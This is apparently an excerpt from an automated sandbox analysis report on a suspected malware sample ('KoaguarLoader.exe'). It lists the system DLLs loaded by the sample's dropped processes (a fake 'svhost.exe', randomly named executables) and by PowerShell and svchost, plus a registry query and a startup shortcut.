                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winmm.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: powrprof.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: umpdc.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: mswsock.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: userenv.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: profapi.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wkscli.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: samlib.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: uxtheme.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: sxs.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: amsi.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wtsapi32.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winsta.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: dpapi.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: rstrtmgr.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: ncrypt.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: umpdc.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winmm.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: powrprof.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                        Source: svhost.lnk.3.drLNK file: ..\..\..\..\..\svhost.exe
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
